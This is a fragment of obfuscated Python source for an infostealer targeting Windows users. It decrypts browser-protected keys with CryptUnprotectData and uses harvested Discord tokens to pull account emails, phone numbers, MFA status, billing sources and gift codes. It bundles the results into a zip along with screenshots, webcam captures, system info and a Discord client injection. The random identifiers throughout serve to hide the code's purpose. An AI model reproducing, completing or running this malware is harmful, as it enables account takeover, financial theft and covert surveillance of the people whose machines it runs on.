        return HOQSOVZFERKWZEBPJLVLKQIRHZZOLJCDNYCYGLLMKPNDRVEGXMHPEFJBUQIACXCDHBGAHFDDMNFNZDURUBVCRPWAQVVLUOZ.decrypt(IJOIPLSGTZPBKWIBZEQNCFPCALIYFHNSBTIFIBBRWKSAREDRVQJTHIBQSQUCJCO)[:-16].decode()

    def HMDVBRLIUXBPIOXIEUTDDWKAPMPWAJXJUVTEYABBMKLLCZEEDPJVVDHGDMYJWDUHPQJKPJJLELESGOGBYXPRDUTVZZCNX(DRDWHTRELYVSHBCGBIGUKJUDNVJDPDWERCEBVEFVUXYMCQSNSPONSEBOWF):
        if not os.path.exists(DRDWHTRELYVSHBCGBIGUKJUDNVJDPDWERCEBVEFVUXYMCQSNSPONSEBOWF):
            return None
        with open(DRDWHTRELYVSHBCGBIGUKJUDNVJDPDWERCEBVEFVUXYMCQSNSPONSEBOWF, "r", encoding="utf-8") as v4r_f:
            FGJJVNZSRGEQDUSCCQSGFYDIZQHYETQSQZVLVCMJXASZZMVPAGMOIINDEKBYHEGJWVMNOPCBPFCICQPQGTBTWOCL = json.load(v4r_f)
        VTXVIEICEQCKHOFQLMTTXGZXOTVPMSSKBSRZZXQBUAVXTFQTHZVPFCDVJDXQR = base64.b64decode(FGJJVNZSRGEQDUSCCQSGFYDIZQHYETQSQZVLVCMJXASZZMVPAGMOIINDEKBYHEGJWVMNOPCBPFCICQPQGTBTWOCL["os_crypt"]["encrypted_key"])[5:]
        return CryptUnprotectData(VTXVIEICEQCKHOFQLMTTXGZXOTVPMSSKBSRZZXQBUAVXTFQTHZVPFCDVJDXQR, None, None, None, 0)[1]

    DUTWDYNZWKZZAJVDGVDOTYRWVWPEITFQRFUYVMOQXDBEXKTHWPTBFJHSBBHXOLDOPPGATUFAIMB, BHXILDUCMELODPWDCNDHUFWKZSSIDTOGVOUYWJQKUNDKQXTIDKEHHVAAIPVFJE = QSLVHYEZQBPWUJSGMLPUHAXOOXLSMBMBQWOKANTMJDUZLFNFFFXKMBMCAMDZQBJUASWWLWJHVJBHQOXNVPISVQCXKIDJVLGEV()
    
    if not DUTWDYNZWKZZAJVDGVDOTYRWVWPEITFQRFUYVMOQXDBEXKTHWPTBFJHSBBHXOLDOPPGATUFAIMB:
        RBRPTAVLSHLUFIBFSPLOVZUOVNFBKLYEFRATLWGYOCMFHEDVMFXKITCHKIICKAYOQZYLPRKWNIJCHPVEXML = "No discord tokens found."

    for VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW_d15c0rd in DUTWDYNZWKZZAJVDGVDOTYRWVWPEITFQRFUYVMOQXDBEXKTHWPTBFJHSBBHXOLDOPPGATUFAIMB:
        BVZLLRJCYLIHINCCWHKRMRIKRZAOGFKHTVCUSICVIYBCDSBZUJRQXMERFRWBNNPNYL += 1

        try: BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM = requests.get('https://discord.com/api/v8/users/@me', headers={'Authorization': VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW_d15c0rd}).json()
        except: BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM = {"None": "None"}

        FPZUFHIKPMQTZTMHLHZHPVVXPZSRIWZPLAZJQDNPZQYHQHHQJQPCISBTFUQUPQGMIGEIDZYZFBRSA = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('username', "None") + '#' + BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('discriminator', "None")
        IYQPAISBDVUWMEQAQUSFCUGCYIEOKDCPEGXVTPZXJDREVCXNTHUAOVRHISALYZGFUAKYTGAYUGVSGIJM = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('global_name', "None")
        JSUDRNTFWJXCAEZAQVUPDJWBMFJYUIQTLCHTKOSDFLGLCYGZWUGOOFILKZIMPGECTNJBHEWQULDCPJELCCSAQHHDAJPEGQHIJ = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('id', "None")
        OYVQQPHXJSMDVFYEXDOAEYLSYXIMSPSNOZEJMHURKEONAODWYIGCOMFJNJKCVAWXCUU = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('email', "None")
        GNFCADJXNQZWEOIITKOFGFZQEQZZJQPEHUZNTWBIBXCBNCIRMAHZNISRIFWGZMIIWARBAHOSLB = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('verified', "None")
        JOTIQHSSUYKPYKBKAWNQDJEDOWDCADLVYCHBPKTHYZCDHJTTISIOXKQYBOTDJFDRHSSJRDONFKJQDVLKAVBCGONFQ = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('phone', "None")
        AAYDGENBIQUKLDXBKBFVCGRDTSZHGBFKVGUWGBLILGOGPLEHBPLNSMTPYBJFUZPFEXNUJWPKMXYMLKY = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('locale', "None")
        DORARODWHZGGGCITMJLRXCMEWQWJPDNEWLJDMITKKLWQYARRWHCXFBEEIEDPZETXHXDKIWRZNFGQFXFWITMYLF = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('mfa_enabled', "None")

        try:
            if BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('premium_type', 'None') == 0:
                CAEJXCWBIRHMHYQSTDKDWQANAQPLEDCRSKPXODBOGBIZAINUUVRETTSWNCLDZMGKJDVQYBLBXKKDOD = 'False'
            elif BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('premium_type', 'None') == 1:
                CAEJXCWBIRHMHYQSTDKDWQANAQPLEDCRSKPXODBOGBIZAINUUVRETTSWNCLDZMGKJDVQYBLBXKKDOD = 'Nitro Classic'
            elif BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('premium_type', 'None') == 2:
                CAEJXCWBIRHMHYQSTDKDWQANAQPLEDCRSKPXODBOGBIZAINUUVRETTSWNCLDZMGKJDVQYBLBXKKDOD = 'Nitro Boosts'
            elif BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('premium_type', 'None') == 3:
                CAEJXCWBIRHMHYQSTDKDWQANAQPLEDCRSKPXODBOGBIZAINUUVRETTSWNCLDZMGKJDVQYBLBXKKDOD = 'Nitro Basic'
            else:
                CAEJXCWBIRHMHYQSTDKDWQANAQPLEDCRSKPXODBOGBIZAINUUVRETTSWNCLDZMGKJDVQYBLBXKKDOD = 'False'
        except:
            CAEJXCWBIRHMHYQSTDKDWQANAQPLEDCRSKPXODBOGBIZAINUUVRETTSWNCLDZMGKJDVQYBLBXKKDOD = "None"

        try: LWXBPIFEWELLCOBDFVWIBNULMNIYDXFNIVMGPFYUBNOLPIHMZBDSZW = f"https://cdn.discordapp.com/avatars/{JSUDRNTFWJXCAEZAQVUPDJWBMFJYUIQTLCHTKOSDFLGLCYGZWUGOOFILKZIMPGECTNJBHEWQULDCPJELCCSAQHHDAJPEGQHIJ}/{BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM['avatar']}.gif" if requests.get(f"https://cdn.discordapp.com/avatars/{JSUDRNTFWJXCAEZAQVUPDJWBMFJYUIQTLCHTKOSDFLGLCYGZWUGOOFILKZIMPGECTNJBHEWQULDCPJELCCSAQHHDAJPEGQHIJ}/{BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM['avatar']}.gif").status_code == 200 else f"https://cdn.discordapp.com/avatars/{JSUDRNTFWJXCAEZAQVUPDJWBMFJYUIQTLCHTKOSDFLGLCYGZWUGOOFILKZIMPGECTNJBHEWQULDCPJELCCSAQHHDAJPEGQHIJ}/{BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM['avatar']}.png"
        except: LWXBPIFEWELLCOBDFVWIBNULMNIYDXFNIVMGPFYUBNOLPIHMZBDSZW = "None"

        try:
            JAGJSTVFHDHYCKXISJWQXAOPLSNKNLQDDRPYXUBQQXZATGKTINGYJGMMUWIDPMQUNZIAERNPS = requests.get('https://discord.com/api/v6/users/@me/billing/payment-sources', headers={'Authorization': VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW_d15c0rd}).json()
            if JAGJSTVFHDHYCKXISJWQXAOPLSNKNLQDDRPYXUBQQXZATGKTINGYJGMMUWIDPMQUNZIAERNPS:
                OMBMOKJJBHPWJRBEZUBDVVMXQSBSTSDILWHIMAYWVMSLSRWPUE = []

                for v4r_method in JAGJSTVFHDHYCKXISJWQXAOPLSNKNLQDDRPYXUBQQXZATGKTINGYJGMMUWIDPMQUNZIAERNPS:
                    if v4r_method['type'] == 1:
                        OMBMOKJJBHPWJRBEZUBDVVMXQSBSTSDILWHIMAYWVMSLSRWPUE.append('Bank Card')
                    elif v4r_method['type'] == 2:
                        OMBMOKJJBHPWJRBEZUBDVVMXQSBSTSDILWHIMAYWVMSLSRWPUE.append("Paypal")
                    else:
                        OMBMOKJJBHPWJRBEZUBDVVMXQSBSTSDILWHIMAYWVMSLSRWPUE.append('Other')
                OMBMOKJJBHPWJRBEZUBDVVMXQSBSTSDILWHIMAYWVMSLSRWPUE = ' / '.join(OMBMOKJJBHPWJRBEZUBDVVMXQSBSTSDILWHIMAYWVMSLSRWPUE)
            else:
                OMBMOKJJBHPWJRBEZUBDVVMXQSBSTSDILWHIMAYWVMSLSRWPUE = "None"
        except:
            OMBMOKJJBHPWJRBEZUBDVVMXQSBSTSDILWHIMAYWVMSLSRWPUE = "None"

        try:
            LOTHHEDZHQQSDAZDJGLJQJDDHOXFRZHNAOMXSYZTMQSTKUCJGSGRIJKRUHBIEHSRRNABLAYJIIYBJOTMUPZKCBIGFRENYXONKH = requests.get('https://discord.com/api/v9/users/@me/outbound-promotions/codes', headers={'Authorization': VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW_d15c0rd}).json()
            if LOTHHEDZHQQSDAZDJGLJQJDDHOXFRZHNAOMXSYZTMQSTKUCJGSGRIJKRUHBIEHSRRNABLAYJIIYBJOTMUPZKCBIGFRENYXONKH:
                OOGAXUJHSLEZDKZSIZEKGNVWQZZEHXVGNMOJQEHGAPTSSSYAJTYYTQNEFSTISQFDAXJNAWQUGASS = []
                for MJIMCONLKVEHETCZPZLBSHHDWKGUDBSLEOIOOKDISVAWVGMQJOTCHFOEFQKWVIGBNTAAMZNEGWLMD in LOTHHEDZHQQSDAZDJGLJQJDDHOXFRZHNAOMXSYZTMQSTKUCJGSGRIJKRUHBIEHSRRNABLAYJIIYBJOTMUPZKCBIGFRENYXONKH:
                    ZRXZTTRAOIUKGOFYNCSQXITLIQPMULHCHKNUVPNPELARFEKXRAAMFQNBUKLWSCGHV = MJIMCONLKVEHETCZPZLBSHHDWKGUDBSLEOIOOKDISVAWVGMQJOTCHFOEFQKWVIGBNTAAMZNEGWLMD['promotion']['outbound_title']
                    MJIMCONLKVEHETCZPZLBSHHDWKGUDBSLEOIOOKDISVAWVGMQJOTCHFOEFQKWVIGBNTAAMZNEGWLMD = MJIMCONLKVEHETCZPZLBSHHDWKGUDBSLEOIOOKDISVAWVGMQJOTCHFOEFQKWVIGBNTAAMZNEGWLMD['code']
                    BHUGGCAXYVODKAWSVYTBSNEQNZRBTCWEZUDXDPPKEYSEHETZDXMEDHTZWEZBJJECTTBWMTIEPMSWMDHXTXZEZAFDHCIZZDUF = f"Gift: \"{ZRXZTTRAOIUKGOFYNCSQXITLIQPMULHCHKNUVPNPELARFEKXRAAMFQNBUKLWSCGHV}\" Code: \"{MJIMCONLKVEHETCZPZLBSHHDWKGUDBSLEOIOOKDISVAWVGMQJOTCHFOEFQKWVIGBNTAAMZNEGWLMD}\""
                    if len('\n\n'.join(MJIMCONLKVEHETCZPZLBSHHDWKGUDBSLEOIOOKDISVAWVGMQJOTCHFOEFQKWVIGBNTAAMZNEGWLMD)) + len(BHUGGCAXYVODKAWSVYTBSNEQNZRBTCWEZUDXDPPKEYSEHETZDXMEDHTZWEZBJJECTTBWMTIEPMSWMDHXTXZEZAFDHCIZZDUF) >= 1024:
                        break
                    OOGAXUJHSLEZDKZSIZEKGNVWQZZEHXVGNMOJQEHGAPTSSSYAJTYYTQNEFSTISQFDAXJNAWQUGASS.append(BHUGGCAXYVODKAWSVYTBSNEQNZRBTCWEZUDXDPPKEYSEHETZDXMEDHTZWEZBJJECTTBWMTIEPMSWMDHXTXZEZAFDHCIZZDUF)
                if len(OOGAXUJHSLEZDKZSIZEKGNVWQZZEHXVGNMOJQEHGAPTSSSYAJTYYTQNEFSTISQFDAXJNAWQUGASS) > 0:
                    MJIMCONLKVEHETCZPZLBSHHDWKGUDBSLEOIOOKDISVAWVGMQJOTCHFOEFQKWVIGBNTAAMZNEGWLMD = '\n\n'.join(OOGAXUJHSLEZDKZSIZEKGNVWQZZEHXVGNMOJQEHGAPTSSSYAJTYYTQNEFSTISQFDAXJNAWQUGASS)
                else:
                    MJIMCONLKVEHETCZPZLBSHHDWKGUDBSLEOIOOKDISVAWVGMQJOTCHFOEFQKWVIGBNTAAMZNEGWLMD = "None"
            else:
                MJIMCONLKVEHETCZPZLBSHHDWKGUDBSLEOIOOKDISVAWVGMQJOTCHFOEFQKWVIGBNTAAMZNEGWLMD = "None"
        except:
            MJIMCONLKVEHETCZPZLBSHHDWKGUDBSLEOIOOKDISVAWVGMQJOTCHFOEFQKWVIGBNTAAMZNEGWLMD = "None"
    
        try: v4r_software_name, DRDWHTRELYVSHBCGBIGUKJUDNVJDPDWERCEBVEFVUXYMCQSNSPONSEBOWF = BHXILDUCMELODPWDCNDHUFWKZSSIDTOGVOUYWJQKUNDKQXTIDKEHHVAAIPVFJE.get(VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW_d15c0rd, ("Unknown", "Unknown"))
        except: v4r_software_name, DRDWHTRELYVSHBCGBIGUKJUDNVJDPDWERCEBVEFVUXYMCQSNSPONSEBOWF = "Unknown", "Unknown"

        RBRPTAVLSHLUFIBFSPLOVZUOVNFBKLYEFRATLWGYOCMFHEDVMFXKITCHKIICKAYOQZYLPRKWNIJCHPVEXML = RBRPTAVLSHLUFIBFSPLOVZUOVNFBKLYEFRATLWGYOCMFHEDVMFXKITCHKIICKAYOQZYLPRKWNIJCHPVEXML + f"""
Discord Account n°{str(BVZLLRJCYLIHINCCWHKRMRIKRZAOGFKHTVCUSICVIYBCDSBZUJRQXMERFRWBNNPNYL)}:
 - Path Found      : {DRDWHTRELYVSHBCGBIGUKJUDNVJDPDWERCEBVEFVUXYMCQSNSPONSEBOWF}
 - Software        : {v4r_software_name}
 - Token           : {VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW_d15c0rd}
 - Username        : {FPZUFHIKPMQTZTMHLHZHPVVXPZSRIWZPLAZJQDNPZQYHQHHQJQPCISBTFUQUPQGMIGEIDZYZFBRSA}
 - Display Name    : {IYQPAISBDVUWMEQAQUSFCUGCYIEOKDCPEGXVTPZXJDREVCXNTHUAOVRHISALYZGFUAKYTGAYUGVSGIJM}
 - Id              : {JSUDRNTFWJXCAEZAQVUPDJWBMFJYUIQTLCHTKOSDFLGLCYGZWUGOOFILKZIMPGECTNJBHEWQULDCPJELCCSAQHHDAJPEGQHIJ}
 - Email           : {OYVQQPHXJSMDVFYEXDOAEYLSYXIMSPSNOZEJMHURKEONAODWYIGCOMFJNJKCVAWXCUU}
 - Email Verified  : {GNFCADJXNQZWEOIITKOFGFZQEQZZJQPEHUZNTWBIBXCBNCIRMAHZNISRIFWGZMIIWARBAHOSLB}
 - Phone           : {JOTIQHSSUYKPYKBKAWNQDJEDOWDCADLVYCHBPKTHYZCDHJTTISIOXKQYBOTDJFDRHSSJRDONFKJQDVLKAVBCGONFQ}
 - Nitro           : {CAEJXCWBIRHMHYQSTDKDWQANAQPLEDCRSKPXODBOGBIZAINUUVRETTSWNCLDZMGKJDVQYBLBXKKDOD}
 - Language        : {AAYDGENBIQUKLDXBKBFVCGRDTSZHGBFKVGUWGBLILGOGPLEHBPLNSMTPYBJFUZPFEXNUJWPKMXYMLKY}
 - Billing         : {OMBMOKJJBHPWJRBEZUBDVVMXQSBSTSDILWHIMAYWVMSLSRWPUE}
 - Gift Code       : {MJIMCONLKVEHETCZPZLBSHHDWKGUDBSLEOIOOKDISVAWVGMQJOTCHFOEFQKWVIGBNTAAMZNEGWLMD}
 - Profile Picture : {LWXBPIFEWELLCOBDFVWIBNULMNIYDXFNIVMGPFYUBNOLPIHMZBDSZW}
 - Multi-Factor Authentication : {DORARODWHZGGGCITMJLRXCMEWQWJPDNEWLJDMITKKLWQYARRWHCXFBEEIEDPZETXHXDKIWRZNFGQFXFWITMYLF}
"""
    TOWWUXFUPEZYQBJVRVHUNEIYEUUTQNMFVEXHNXMFIKPWVHDSMVRVTWYCWNZYFQZDEUQAIIMUNWJGUUYVOMA.writestr(f"Discord Accounts ({BVZLLRJCYLIHINCCWHKRMRIKRZAOGFKHTVCUSICVIYBCDSBZUJRQXMERFRWBNNPNYL}).txt", RBRPTAVLSHLUFIBFSPLOVZUOVNFBKLYEFRATLWGYOCMFHEDVMFXKITCHKIICKAYOQZYLPRKWNIJCHPVEXML)

    return BVZLLRJCYLIHINCCWHKRMRIKRZAOGFKHTVCUSICVIYBCDSBZUJRQXMERFRWBNNPNYL

UPXUCYEMQHPNKNHDIEJRIWLOBCWIAUMDGDBOTLRCVKNQEUPMQKPCSIMWKBFYGHRJCAVCVSOYKSBCPDJE = []

FQDGYASXNBFMNLJUYZLUITYYSWUUHTZBHQTGAPJKBHJHPGFBBJYCAWYFTIPVQBTELEOSQIQMVZCRNIDGCFWWTX = io.BytesIO()
with zipfile.ZipFile(FQDGYASXNBFMNLJUYZLUITYYSWUUHTZBHQTGAPJKBHJHPGFBBJYCAWYFTIPVQBTELEOSQIQMVZCRNIDGCFWWTX, "w", zipfile.ZIP_DEFLATED) as TOWWUXFUPEZYQBJVRVHUNEIYEUUTQNMFVEXHNXMFIKPWVHDSMVRVTWYCWNZYFQZDEUQAIIMUNWJGUUYVOMA:

    try: 
        PLTBISXOVUHRJRGXVJQOSLGWMFHYZTEBBQFDCBCZAAWGGXCBINVLBVWOJQRLSZBSNJWENAUGEEGSUJKDDFLEYTQWKSKPSRNHEZC = CQKCGLPZABNAWLCHVWAISPRSAUNJHGDEEZGQQSNBXSQBTQHVZXBFQEMULFYYIGMIWNEXG()
    except Exception as e:
        PLTBISXOVUHRJRGXVJQOSLGWMFHYZTEBBQFDCBCZAAWGGXCBINVLBVWOJQRLSZBSNJWENAUGEEGSUJKDDFLEYTQWKSKPSRNHEZC = f"Error: {e}"

    try: 
        CMIJPCGADFWOVQNZHAWGANMCJNIQTXBBXCWJGWNEOETACFRNAFNOQJLGRNMYQPHTEWMGLFTZKYLJRXZIAC_system_info = SJRJOHAXPUEBRBKTMATFUNLKHYGATPQYKSZNUQYQTIYELEWTRRRIFTKFMFQPGDSJQPNNEJRQEOKMDYI(TOWWUXFUPEZYQBJVRVHUNEIYEUUTQNMFVEXHNXMFIKPWVHDSMVRVTWYCWNZYFQZDEUQAIIMUNWJGUUYVOMA)
    except Exception as e:
        CMIJPCGADFWOVQNZHAWGANMCJNIQTXBBXCWJGWNEOETACFRNAFNOQJLGRNMYQPHTEWMGLFTZKYLJRXZIAC_system_info = f"Error: {e}"

    try: 
        BVZLLRJCYLIHINCCWHKRMRIKRZAOGFKHTVCUSICVIYBCDSBZUJRQXMERFRWBNNPNYL = AXYIGABCUKOEWXFZZCKFYUNKPUTNVVDULYLJZHFKNYESIWRPQRQKMZOPPCHTUUKSXEUEW(TOWWUXFUPEZYQBJVRVHUNEIYEUUTQNMFVEXHNXMFIKPWVHDSMVRVTWYCWNZYFQZDEUQAIIMUNWJGUUYVOMA)
    except Exception as e:
        BVZLLRJCYLIHINCCWHKRMRIKRZAOGFKHTVCUSICVIYBCDSBZUJRQXMERFRWBNNPNYL = f"Error: {e}"

    try: 
        QJVMSWWRKJNPSIYCGICDQMPNVDRAWKEDDPJQXKQHAGXOEWEJNMWEAGRGZNBLAXEQJLJSTBALPCZDHXYSIOYVYGUSHYH, EVEBGMFNCZISLHWURZTVOFCVRZYWNRXCWDOKZOOHMCCOOVWTATICDKHCKZXQNOFEATIHMPTVUBGVFYISRDTJNLYDWBNNSW, LYPWCPDVIDCGKYKCRZRTWJAMSXWNOIOCERTWZUJLUIKAFCUQTAWKOVGALDUEXWUENQQQTAUFSYIAECTPOACFEWVJNKKDVPIXG, ZMXSPIEQIAPIZAURQQBPTZGQTCBYPGKVLLGWKTHEXKQIRGCUNNRJGSFSOAFITLRWEI, BNTMLWGLFFHEAJYVHZPAXIDRKPIUQBKUCZKKZDCFCAJCCRTDLKMASQUGPJEPBXBLVRXBT, NFEXAEMPGGYEFRFQZGWLNECNEFVDHJFEGMNJJUUHXNDNXGTAZDKADZCXXLPFAATDXMPWGZHFUFEANZRTANISNBWHOIVRXDLYJ = CUHNOFRNZGGSHNHVRKQVNMEZOZCJUPYWXKGKMHYWCNAIPUVNIQPQMMMODMARQJJFBWHRTVAZIPNJUIJAWPSDXEXZDFMPKJE(TOWWUXFUPEZYQBJVRVHUNEIYEUUTQNMFVEXHNXMFIKPWVHDSMVRVTWYCWNZYFQZDEUQAIIMUNWJGUUYVOMA)
    except Exception as e:
        QJVMSWWRKJNPSIYCGICDQMPNVDRAWKEDDPJQXKQHAGXOEWEJNMWEAGRGZNBLAXEQJLJSTBALPCZDHXYSIOYVYGUSHYH = f"Error: {e}"
        EVEBGMFNCZISLHWURZTVOFCVRZYWNRXCWDOKZOOHMCCOOVWTATICDKHCKZXQNOFEATIHMPTVUBGVFYISRDTJNLYDWBNNSW = f"Error: {e}"
        LYPWCPDVIDCGKYKCRZRTWJAMSXWNOIOCERTWZUJLUIKAFCUQTAWKOVGALDUEXWUENQQQTAUFSYIAECTPOACFEWVJNKKDVPIXG = f"Error: {e}"
        ZMXSPIEQIAPIZAURQQBPTZGQTCBYPGKVLLGWKTHEXKQIRGCUNNRJGSFSOAFITLRWEI = f"Error: {e}"
        BNTMLWGLFFHEAJYVHZPAXIDRKPIUQBKUCZKKZDCFCAJCCRTDLKMASQUGPJEPBXBLVRXBT = f"Error: {e}"
        NFEXAEMPGGYEFRFQZGWLNECNEFVDHJFEGMNJJUUHXNDNXGTAZDKADZCXXLPFAATDXMPWGZHFUFEANZRTANISNBWHOIVRXDLYJ = f"Error: {e}"

    try: 
        SARLBJUIRIVQCXCXIRRCKPBLHFQNZGRJIRNNZNFPTDIFZPMIPTSHEEJYAX = GRCXJFURVWLOYNYABVVSOMWPNXYDHQWJZBDYMCQWRKVXXAJYJZBHKDBQKAUXNNAHSLD(TOWWUXFUPEZYQBJVRVHUNEIYEUUTQNMFVEXHNXMFIKPWVHDSMVRVTWYCWNZYFQZDEUQAIIMUNWJGUUYVOMA)
    except Exception as e:
        SARLBJUIRIVQCXCXIRRCKPBLHFQNZGRJIRNNZNFPTDIFZPMIPTSHEEJYAX = f"Error: {e}"

    try: 
        CMIJPCGADFWOVQNZHAWGANMCJNIQTXBBXCWJGWNEOETACFRNAFNOQJLGRNMYQPHTEWMGLFTZKYLJRXZIAC_camera_capture = URGASTEOAIEVXCVTZKGHUODWXUGVFBSPSETLHISVRGAXKBZQAQXUJICRFODGDEUYTJLVDUKVJDPQQMRLKMEZBNWU(TOWWUXFUPEZYQBJVRVHUNEIYEUUTQNMFVEXHNXMFIKPWVHDSMVRVTWYCWNZYFQZDEUQAIIMUNWJGUUYVOMA)
    except Exception as e:
        CMIJPCGADFWOVQNZHAWGANMCJNIQTXBBXCWJGWNEOETACFRNAFNOQJLGRNMYQPHTEWMGLFTZKYLJRXZIAC_camera_capture = f"Error: {e}"

    try: 
        CMIJPCGADFWOVQNZHAWGANMCJNIQTXBBXCWJGWNEOETACFRNAFNOQJLGRNMYQPHTEWMGLFTZKYLJRXZIAC_screenshot = KNNWBKAYMOLWQJZNPDGSMATUTRHJBZHEACSVSFIWMJVEYGDRUIFKTLDPRGIGRBSVFRSLA(TOWWUXFUPEZYQBJVRVHUNEIYEUUTQNMFVEXHNXMFIKPWVHDSMVRVTWYCWNZYFQZDEUQAIIMUNWJGUUYVOMA)
    except Exception as e:
        CMIJPCGADFWOVQNZHAWGANMCJNIQTXBBXCWJGWNEOETACFRNAFNOQJLGRNMYQPHTEWMGLFTZKYLJRXZIAC_screenshot = f"Error: {e}"

    try: 
        PKLQUNDHVHGBANMMGYHMOVAVVRYMXNLYRVDOMRGCBHTAWMLZTA, OZPOYBUMRWOBRSRDOIEZAKSTBWNGQFLBDGEJCELVOEAYAPCEGWOCTTVD, QTLLCDKDUUDNVVEDYXAVIMDJGHBBOGZXBUHQMYYBEHLLQFDRCTDASOZBSLZXGSKXACMCMMCGXAYFOOUCFCBGFAABBBLLLFFCAWJS = NTOWSSMUWCDBVFSIMBHETDPXETTAXCFHEULUGMHGITAYFMAWCDFWOBGAUSMXFHNTNENSUBOAOHHSKNFRVCSDPCFCGMGZUWEK(TOWWUXFUPEZYQBJVRVHUNEIYEUUTQNMFVEXHNXMFIKPWVHDSMVRVTWYCWNZYFQZDEUQAIIMUNWJGUUYVOMA)
    except Exception as e:
        CMIJPCGADFWOVQNZHAWGANMCJNIQTXBBXCWJGWNEOETACFRNAFNOQJLGRNMYQPHTEWMGLFTZKYLJRXZIAC_screenshot = f"Error: {e}"

    try: 
        HADGGYUVASHYJSNSSPPLGAKRSMERULPYNTNNLSJCIKBZLUBTPIBQYFQNSBLMMJHSMWMQB = ZFIKMHSLSYWLIHOBVLEPCWZHRSPXPOUOZJVHQFWDSEOSDLYZKHQ(TOWWUXFUPEZYQBJVRVHUNEIYEUUTQNMFVEXHNXMFIKPWVHDSMVRVTWYCWNZYFQZDEUQAIIMUNWJGUUYVOMA)
    except Exception as e:
        HADGGYUVASHYJSNSSPPLGAKRSMERULPYNTNNLSJCIKBZLUBTPIBQYFQNSBLMMJHSMWMQB = f"Error: {e}"

    if PLTBISXOVUHRJRGXVJQOSLGWMFHYZTEBBQFDCBCZAAWGGXCBINVLBVWOJQRLSZBSNJWENAUGEEGSUJKDDFLEYTQWKSKPSRNHEZC != None:
        UPXUCYEMQHPNKNHDIEJRIWLOBCWIAUMDGDBOTLRCVKNQEUPMQKPCSIMWKBFYGHRJCAVCVSOYKSBCPDJE.append(f"Discord Injection : {PLTBISXOVUHRJRGXVJQOSLGWMFHYZTEBBQFDCBCZAAWGGXCBINVLBVWOJQRLSZBSNJWENAUGEEGSUJKDDFLEYTQWKSKPSRNHEZC}")

    if CMIJPCGADFWOVQNZHAWGANMCJNIQTXBBXCWJGWNEOETACFRNAFNOQJLGRNMYQPHTEWMGLFTZKYLJRXZIAC_camera_capture != None:
        UPXUCYEMQHPNKNHDIEJRIWLOBCWIAUMDGDBOTLRCVKNQEUPMQKPCSIMWKBFYGHRJCAVCVSOYKSBCPDJE.append(f"Camera Capture    : {CMIJPCGADFWOVQNZHAWGANMCJNIQTXBBXCWJGWNEOETACFRNAFNOQJLGRNMYQPHTEWMGLFTZKYLJRXZIAC_camera_capture}")

    if CMIJPCGADFWOVQNZHAWGANMCJNIQTXBBXCWJGWNEOETACFRNAFNOQJLGRNMYQPHTEWMGLFTZKYLJRXZIAC_screenshot != None:
        UPXUCYEMQHPNKNHDIEJRIWLOBCWIAUMDGDBOTLRCVKNQEUPMQKPCSIMWKBFYGHRJCAVCVSOYKSBCPDJE.append(f"Screenshot        : {CMIJPCGADFWOVQNZHAWGANMCJNIQTXBBXCWJGWNEOETACFRNAFNOQJLGRNMYQPHTEWMGLFTZKYLJRXZIAC_screenshot}")

    if CMIJPCGADFWOVQNZHAWGANMCJNIQTXBBXCWJGWNEOETACFRNAFNOQJLGRNMYQPHTEWMGLFTZKYLJRXZIAC_system_info != None:
        UPXUCYEMQHPNKNHDIEJRIWLOBCWIAUMDGDBOTLRCVKNQEUPMQKPCSIMWKBFYGHRJCAVCVSOYKSBCPDJE.append(f"System Info       : {CMIJPCGADFWOVQNZHAWGANMCJNIQTXBBXCWJGWNEOETACFRNAFNOQJLGRNMYQPHTEWMGLFTZKYLJRXZIAC_system_info}")

    if BVZLLRJCYLIHINCCWHKRMRIKRZAOGFKHTVCUSICVIYBCDSBZUJRQXMERFRWBNNPNYL != None:
        UPXUCYEMQHPNKNHDIEJRIWLOBCWIAUMDGDBOTLRCVKNQEUPMQKPCSIMWKBFYGHRJCAVCVSOYKSBCPDJE.append(f"Discord Accounts  : {BVZLLRJCYLIHINCCWHKRMRIKRZAOGFKHTVCUSICVIYBCDSBZUJRQXMERFRWBNNPNYL}")

